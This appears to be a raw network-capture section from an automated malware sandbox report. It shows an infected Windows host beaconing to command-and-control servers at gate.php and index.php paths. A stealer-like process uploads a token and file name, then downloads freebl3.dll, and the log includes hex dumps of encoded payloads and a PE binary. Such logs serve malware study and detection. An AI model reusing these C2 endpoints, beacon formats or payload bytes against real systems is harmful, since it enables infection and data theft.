Dec 12, 2024 16:49:30.848236084 CET	1236	IN	Data Raw: 8a 4d ec 81 c7 51 96 00 00 b8 f9 24 e5 4e 89 7d 0c 2b c3 c6 45 ff 3b 89 45 e8 b2 0c 0f b6 45 0c 6b c0 64 2a d0 d2 ea 69 45 f8 f6 86 f1 2f 8b 4d 1c 89 55 f4 89 4d 1c 89 45 f8 8b 4d 14 89 4d c8 8a 45 18 8b 75 f8 0f b7 55 0c 8b 4d e8 03 ca 89 55 a4 Data Ascii: MQ$N}+E;EEkd*iE/MUMEMMEuUMUMEEMdjEEdM(eUMfMMMEEMMM+M(eM;vYEE3E.auNcuu6`Euu
Dec 12, 2024 16:49:30.848242044 CET	1236	IN	Data Raw: 43 33 18 0f b7 c0 80 45 fc 85 89 45 dc 89 45 d0 8b 45 c4 2b 05 d0 28 65 00 89 45 c4 89 45 d4 b8 77 ff 86 6f 2b 45 b4 01 45 10 b8 3d 99 ae 6b 2b 45 a4 01 45 c0 69 45 d8 09 ab ff ff 81 6d e4 c1 18 f8 47 89 75 08 89 75 e0 89 4d 1c 0f b7 c0 89 45 d8 Data Ascii: C3EEEE+(eEEwo+EE=k+EEiEmGuuMEM9MMME3(eEu5(eEr,EEEERMMUiEX5(eMELE(eiEEEEJ0";
Dec 12, 2024 16:49:30.848248959 CET	1236	IN	Data Raw: 03 d0 8b 45 e4 0f b7 c0 0f b7 ca 0f af c8 69 45 1c 46 ae 20 14 0f b7 f9 05 96 cc 3a 0e 89 7d 0c 0f b6 4d 0c 89 45 1c 8b 45 f4 0f b6 c0 0f af c8 69 45 f8 8b f8 24 a6 88 4d f4 89 45 f8 8b 4d 1c 8b 75 08 8b 45 18 0f bf 55 e0 89 55 b4 3b ca 8b 55 10 Data Ascii: EiEF :}MEEiE$MEMuEUU;UEv}E2]3EEmcEMMfMEE)EEEEUEMEuuUuEMMMMM9MEvmE+
Dec 12, 2024 16:49:30.848330021 CET	1236	IN	Data Raw: b7 f0 66 8b 45 fc 81 6d 1c 06 2f 8e 06 0f b6 c0 81 6d d8 38 27 00 00 0f b6 ca 0f af c8 8b 45 f8 0f af 05 f4 28 65 00 69 d2 8f 5e 87 08 89 7d 0c 88 4d fc 69 4d f8 20 0f 73 5e a3 f4 28 65 00 0f b7 c7 05 ea f9 0d 01 89 55 10 01 45 e8 66 8b 15 ec 28 Data Ascii: fEm/m8'E(ei^}MiM s^(eUEf(eEMffMAn^MfiEZMf(e+EYE;MEEui2Ef(efEEEUUUUf5(euUUM;MMMu9
Dec 12, 2024 16:49:30.848365068 CET	1236	IN	Data Raw: f4 8b 4d 1c a3 e0 28 65 00 8d 3c 4f e9 0a 01 00 00 8b 45 cc 39 45 b8 75 35 0f b7 4d 0c 2d 45 12 c8 16 d3 2d cc 28 65 00 8a ca d2 2d ca 28 65 00 89 45 cc 66 8b 45 fc 0f b6 c0 6b c0 2c 02 05 c4 28 65 00 2b 5d cc 88 45 fc e9 c4 00 00 00 66 8b 45 fc Data Ascii: M(e<OE9Eu5M-E-(e-(eEfEk,(e+]EfEE;uAfEf)(eE(eEEEkmi_DuEWQMuME;u9M(eM+MUMMMMf(efm}ME:(eu+}E
Dec 12, 2024 16:49:30.848372936 CET	1236	IN	Data Raw: 45 cc 8b 45 14 05 99 32 99 2d 66 89 15 c8 28 65 00 0f b7 d1 8b 4d 08 66 d3 3d ec 28 65 00 8b 4d e4 03 c1 03 4d 90 89 45 14 66 8b c7 98 01 05 f4 28 65 00 8b 45 10 0f b6 c0 6b c0 53 89 4d e4 b1 e6 2b 75 14 89 7d e8 89 75 f8 2a c8 0f b6 45 f0 0f b6 Data Ascii: EE2-f(eMf=(eMMEf(eEkSM+u}u*EuMMEEE(eE>QMUEE-lmaEuu>QuY^ioMMmf(ef-(ef)E+}UUuu
Dec 12, 2024 16:49:30.968653917 CET	1236	IN	Data Raw: 89 45 a8 89 45 d0 8b 45 b8 89 4d fc 8b 4d b4 2b c1 89 45 b8 89 45 cc 8b 45 dc 2d 8f da ca 3d 89 75 f8 00 45 10 89 45 dc a1 e4 28 65 00 01 45 bc 8b 45 f4 89 75 f0 e9 64 05 00 00 0f bf 55 e8 3b 55 d8 8b 55 14 8b 75 f8 75 58 69 c7 6e fd ff ff c1 fe Data Ascii: EEEMM+EEE-=uEE(eEEudU;UUuuXinuuf)E(eEEEEEE(eMmEEzEEEE;EE)MM,EE)EEfEmOMM(efmMf(

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.10	50067	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:30.703336954 CET	264	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:49:32.034992933 CET	257	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:31 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 40 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62 Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.10	50068	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:32.157452106 CET	284	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 10
Dec 12, 2024 16:49:32.277224064 CET	10	OUT	Data Raw: 72 57 42 2b 57 5a 5c 55 43 12 Data Ascii: rWB+WZ\UC
Dec 12, 2024 16:49:33.615888119 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 38 64 61 34 0d 0a 4e 3f 3c 6f 33 10 19 16 17 43 44 10 5b 6a 5b 55 57 57 5b 59 5d 17 46 12 58 17 6d 45 14 4c 5b 05 46 47 1e 1f 49 13 48 42 17 18 45 1b 54 53 13 18 54 0e 5c 48 15 19 19 1b 1c 57 5c 5c 51 0a 46 43 48 19 51 0a 59 01 58 03 1b 54 5b 5c 49 13 48 42 17 18 42 07 55 55 54 53 43 13 48 4c 5a 5a 43 50 5a 58 51 1b 5b 16 55 1a 40 1b 16 47 1c 15 55 00 50 55 46 5e 14 42 0d 0c 52 1c 51 0d 56 57 55 53 19 02 5e 0f 1d 17 15 19 14 1e 43 50 46 12 5b 53 07 44 18 08 59 1c 5d 0a 59 56 1a 52 0c 5c 4e 40 19 12 14 0b 57 53 56 5b 5e 0f 56 4c 43 50 55 5c 5b 51 44 47 4d 4a 5f 5f 18 5e 5a 09 57 48 5b 14 52 15 18 11 41 1b 03 0d 5a 55 5a 07 4f 59 5d 53 58 4f 52 0d 5a 1f 1b 15 16 16 44 47 55 0a 41 5c 03 43 53 4b 51 09 5b 01 59 52 55 41 0a 42 4a 01 5a 5f 14 4e 19 12 13 5a 52 0f 52 10 19 5a 4b 5e 1c 16 1c 15 16 4e 5e 5f 05 1a 43 15 5a 09 55 02 18 58 47 1f 0b 5e 1d 0d 43 57 44 11 5c 1e 5a 59 5a 4b 13 4e 17 17 5b 08 18 5a 55 59 1a 03 5d 5f 05 1d 14 49 16 44 1e 10 1b 54 58 50 11 58 10 1b 1b 5f 45 48 1b 1c 19 14 1d 05 5f 11 [TRUNCATED] Data Ascii: 8da4N?<o3CD[j[UWW[Y]FXmEL[FGIHBETST\HW\\QFCHQYXT[\IHBBUUTSCHLZZCPZXQ[U@GUPUF^BRQVWUS^CPF[SDY]YVR\N@WSV[^VLCPU\[QDGMJ__^ZWH[RAZUZOY]SXORZDGUA\CSKQ[YRUABJZ_NZRRZK^N^_CZUXG^CWD\ZYZKN[ZUY]_IDTXPX_EH_VVTNJX[OJDN[DDQYkl;B:?4<F[^RUEDF8=C?o?B;=A<hN9nBEFFBF]AD@V]X\HPYYL\UTWHCQWZBQ^TEDk?CDB@IQM^[@4<DBGAV9VXZE_@?<BABn43DBE9lCDBBPVj[\P[BP^AWAEQPEPj@__K[U6RY\TW@YDAn\h<FFCDBBPX]RXQWQVE9UQhZDmFBGD\HMkCRYSP^U@EVUC__U\XZDY[SMlO^DEXWW\TGl@[WSk\RXU?Z,@_K_rRArEA\G@TZZVTZX[GAECEPj@MUABkCVAM\DZi?[j9FBYBQ?8@\W\eTCh[LTjXU^UPB:WkXnSlVEQZZLElhFQCYYFVCmA^i]eTCh[LTjVXAC_kYYKVXZE^B[G[KYZjACCXUCQGQQDASXjDRGZXeP_WP
Dec 12, 2024 16:49:33.615930080 CET	1236	IN	Data Raw: 41 4c 53 6b 43 0f 5e 5b 54 5b 5c 5a 14 56 5a 46 59 6e 12 07 4f 46 3a 52 07 40 03 69 15 14 43 15 1c 10 07 4d 46 0b 3e 1b 53 56 58 51 08 56 4c 56 45 49 17 5f 50 55 5b 40 0d 54 59 01 56 42 0c 59 08 1a 08 40 5a 57 5d 0a 54 0a 16 69 10 08 51 17 10 05 Data Ascii: ALSkC^[T[\ZVZFYnOF:R@iCMF>SVXQVLVEI_PU[@TYVBY@ZW]TiQEG_BTYXJElXPUhPSP:pPTDWNPBXB^_^FIXXXPUXACMA8@AWNeFVEE[eo9l@@ZQ[ihC_Pj@\HIiSEkTWL\PZFX_kT:FF^NT^mFSnBXEMY
Dec 12, 2024 16:49:33.615942955 CET	448	IN	Data Raw: 03 06 3e 1b 10 58 43 43 0e 57 0d 54 40 4a 04 6a 16 6c 17 14 05 47 44 0d 54 59 17 44 03 57 12 08 6b 16 5e 05 57 38 40 15 5b 52 5f 65 12 5a 57 45 05 6e 0c 42 58 65 1b 16 57 5c 54 47 17 0f 6c 40 51 59 17 5b 4b 57 09 5b 43 46 5e 0f 11 0a 17 58 57 44 Data Ascii: >XCCWT@JjlGDTYDWk^W8@[R_eZWEnBXeW\TGl@QY[KW[CF^XWDZlEVYL\FUTW[FjGPF^Pe]TF_LUe]]UPUP[BhFWHhRBhDEBTnV^__POPGP]SZD\RQQ^YAV[]TE8@BCIWYARVFJj\TV^o^SR:XqV@TCUCMB_
Dec 12, 2024 16:49:33.615955114 CET	1236	IN	Data Raw: 0d 44 07 1a 47 5c 58 55 40 59 43 51 59 6e 12 04 58 44 08 18 0f 50 32 50 5b 51 5c 02 45 0d 13 40 57 6a 40 07 0c 55 57 55 04 5d 42 51 5a 4b 04 6a 16 53 43 42 38 10 10 10 41 1b 11 53 1e 40 5b 69 15 57 5e 0d 57 0d 05 1b 53 46 12 17 59 5d 53 59 15 58 Data Ascii: DG\XU@YCQYnXDP2P[Q\E@Wj@UWU]BQZKjSCB8AS@[iW^WSFY]SYX^VXM_[^Z_S^SB:XAQZJCjPRYf__Q\QhFs4aJEU]S_IEMCAiMSLDiDBQCSX[hDn>8@DWLUj=BYTT\hVBnBZWZZA_mAT>ECUjP>
Dec 12, 2024 16:49:33.616023064 CET	1236	IN	Data Raw: 55 55 08 17 5d 1e 06 5e 43 07 05 54 46 0e 09 50 0d 44 10 01 5b 57 16 45 5b 68 44 54 42 40 59 4e 52 17 4f 56 5d 58 16 5c 5e 4d 16 17 12 46 0f 68 5c 57 49 43 40 1d 56 5b 0a 46 51 0b 59 53 17 6a 44 0a 46 09 5e 5a 41 16 45 44 0b 51 0f 6a 40 4c 43 5c Data Ascii: UU]^CTFPD[WE[hDTB@YNROV]X\^MFh\WIC@V[FQYSjDF^ZAEDQj@LC\DhU>WX[QiJ@=SWS:FANDT^mFPJB>ZZVB_kJN[kY[DFESiFFD_XO\\FMlVETTIPBU\\Nl@YYS:FTB@^^PQB_eVPQ=BVGPXXQWQl@tYSFW\RZE?DYSUQ_UR
Dec 12, 2024 16:49:33.616034985 CET	1236	IN	Data Raw: 10 46 03 4d 58 1b 0c 17 43 1b 40 1b 38 33 19 16 14 10 15 14 44 12 10 42 15 41 00 54 39 57 09 5b 43 51 5f 17 13 5e 6f 3f 12 16 42 19 10 19 16 17 41 11 39 3a 3f 19 19 16 14 10 15 14 44 12 10 42 17 16 1e 3b 6c 14 46 15 17 14 11 43 11 44 42 15 12 16 Data Ascii: FMXC@83DBAT9W[CQ_^o?BA9:?DB;lFCDBBRVP=UP_VDQF[T_kWGZSQ<TZ@{JCXQR=BVGPX\YQP\>BChD<iDBBABPW\QSA^^R@X\A_AXTUjPSjWL[VUGhFSVE:YDCGPU
Dec 12, 2024 16:49:33.616115093 CET	1236	IN	Data Raw: 6d 38 00 05 4a 6d 03 14 56 78 1b 71 51 1c 5b 6a 4e 0d 09 4b 68 6c 57 1b 03 12 6d 59 17 55 0a 58 15 40 46 59 43 57 63 06 56 01 1a 50 41 16 5f 19 6b 19 19 6b 3d 53 4a 7b 49 74 45 5a 40 53 04 1d 3f 53 1d 18 76 1b 2d 7c 4b 7a 36 18 6d 04 1c 5a 6c 1f Data Ascii: m8JmVxqQ[jNKhlWmYUX@FYCWcVPA_kk=SJ{ItEZ@S?Sv-\|Kz6mZlP[DleT?ZVXGD@JbPSS[l?mJaNBKbQLvLy({ilikj;P^D[FLUKOd]TAVKwX\NLQYsWRX^DWZLZXPZS/^RF_YFuTW^SSEX^RK_
Dec 12, 2024 16:49:33.616177082 CET	1236	IN	Data Raw: 17 14 11 43 11 44 42 15 12 16 42 19 12 5d 57 43 00 6e 00 52 53 56 4b 53 16 0a 15 16 58 1d 44 0b 43 5a 00 08 44 18 6b 3f 17 14 11 43 11 44 42 15 12 16 42 19 12 50 58 5d 04 52 16 15 0f 19 1b 0a 47 53 47 5d 14 46 0e 04 42 58 06 42 0f 5b 08 15 45 51 Data Ascii: CDBB]WCnRSVKSXDCZDk?CDBBPX]RGSG]FBXB[EQAPt^Z#]TKSDT[\NwPTGQAU[FCSR6RWNJlA>kWbmnUIY]OMwH~,(enN9QMjkejVVL98=UKOvy)*2hOmBM[JeeTWi_SYE@gRST
Dec 12, 2024 16:49:33.616189003 CET	1236	IN	Data Raw: 3f 50 50 03 00 61 69 04 4b 00 36 06 5a 05 33 74 07 73 4f 45 07 02 54 10 19 19 4d 44 4c 0a 15 13 30 70 5d 01 65 4f 5d 74 51 06 11 40 62 60 7f 55 70 2f 27 64 00 7e 16 6a 5b 0d 0e 50 0f 04 10 5f 45 7b 1e 16 49 0b 15 47 01 46 79 0c 43 53 17 40 07 58 Data Ascii: ?PPaiK6Z3tsOETMDL0p]eO]tQ@b`Up/'d~j[P_E{IGFyCS@XN]E^W\qUZvURFJ\E^PC%VTRESJ_G[F4<ABH9nBkh<FIJ8=9;CJihBEKZ[@DAXRSSZYF=hEDDA_CN@?<B@S=TZWMSZDDi=hEFF
Dec 12, 2024 16:49:33.616199970 CET	1236	IN	Data Raw: 5f 1e 06 5a 07 47 15 7b 56 59 54 43 0c 5a 42 4e 12 5f 04 19 18 5a 5a 56 12 42 2c 56 58 5c 17 42 5b 7c 5a 43 01 40 73 03 44 53 4d 1f 48 5d 08 56 5b 41 55 06 42 4c 45 44 40 55 0d 5d 55 1e 1f 1e 41 4a 42 52 59 17 5a 5a 55 43 46 78 0d 41 44 4c 45 53 Data Ascii: _ZG{VYTCZBN_ZZVB,VX\B[\|ZC@sDSMH]V[AUBLED@U]UAJBRYZZUCFxADLESYQNV[UBPBDDALBJKSZZFRA$RFFDQBCDPBgsqQOoVmq)vXGXyw3dW2oB\DQFU\STWSRPU_QUWSPXRSPQUBW(V^2gP5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.10	50070	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:32.447632074 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:32.570048094 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:33.950499058 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:33 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.10	50071	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:34.268636942 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:34.388673067 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:35.902717113 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:34 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.10	50072	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:34.653986931 CET	264	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Dec 12, 2024 16:49:36.018497944 CET	257	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 40 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 35 32 36 62 39 30 39 36 37 61 31 62 37 35 39 39 36 34 30 35 34 64 32 30 62 37 36 65 36 66 34 66 35 37 34 31 63 31 64 62 Data Ascii: 526b90967a1b759964054d20b76e6f4f5741c1db

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.10	50075	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:36.138901949 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:36.259902954 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:37.966665983 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:36 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.10	50076	185.81.68.147	80

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:36.148298979 CET	284	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 10
Dec 12, 2024 16:49:36.271923065 CET	10	OUT	Data Raw: 72 57 42 2b 57 5a 5c 55 43 12 Data Ascii: rWB+WZ\UC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.10	50078	185.215.113.43	80	7820	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:37.772818089 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 34 34 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1014446001&unit=246122658369
Dec 12, 2024 16:49:39.185091019 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 12 Dec 2024 15:49:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.10	50080	185.81.68.147	80	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:38.198062897 CET	283	OUT	POST /tizhyf/gate.php?2DB3A69DE7692371543510 HTTP/1.1 Host: 185.81.68.147 Pragma: no-cache Content-type: text/html Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3 Content-Length: 4
Dec 12, 2024 16:49:38.318334103 CET	6	OUT	Data Raw: 45 5b 58 05 Data Ascii: E[X
Dec 12, 2024 16:49:39.876677990 CET	216	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 23:49:38 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.10	50084	185.215.113.206	80	7020	C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exe

Timestamp	Bytes transferred	Direction	Data
Dec 12, 2024 16:49:39.788738012 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHD Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 63 64 61 66 31 34 30 64 35 36 61 62 39 34 34 63 36 38 31 36 64 61 36 62 64 33 37 66 33 38 36 64 30 62 39 62 38 32 66 37 36 31 36 30 34 34 64 39 36 63 61 31 35 33 36 35 34 30 36 65 34 63 36 35 31 61 61 33 64 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="token"dcdaf140d56ab944c6816da6bd37f386d0b9b82f7616044d96ca15365406e4c651aa3d47------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file"------JEBKEHJJDAAAAKECBGHD--
Dec 12, 2024 16:49:41.591861010 CET	203	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:40 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 12, 2024 16:49:43.856801987 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 12, 2024 16:49:44.295047998 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 12 Dec 2024 15:49:44 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 12, 2024 16:49:44.295073986 CET	124	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}U
Dec 12, 2024 16:49:44.297791004 CET	1236	IN	Data Raw: 10 8b 4d 0c 85 ff 74 22 f2 0f 10 07 f2 0f 11 80 30 01 00 00 eb 28 68 05 e0 ff ff e8 7f 0b 08 00 83 c4 04 b8 ff ff ff ff eb 26 c7 80 34 01 00 00 a6 a6 a6 a6 c7 80 30 01 00 00 a6 a6 a6 a6 6a 10 56 6a 00 6a 00 52 51 50 e8 3f 96 06 00 83 c4 1c 5e 5f Data Ascii: Mt"0(h&40jVjjRQP?^_]USWVhO?t081tkEU]Mt0%h1<40jRjjPQWt8^
Dec 12, 2024 16:49:44.297813892 CET	1236	IN	Data Raw: 0f 84 8d 02 00 00 89 54 24 34 89 44 24 30 89 f8 83 e0 f8 50 e8 88 06 08 00 83 c4 04 85 c0 0f 84 7c 02 00 00 89 c3 89 f8 c1 ef 03 8d 4f ff 89 4c 24 38 50 56 53 e8 27 07 08 00 83 c4 0c f2 0f 10 03 f2 0f 11 44 24 40 8d 04 3f 83 c0 fe 8d 04 40 89 c1 Data Ascii: T$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$D$ 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$
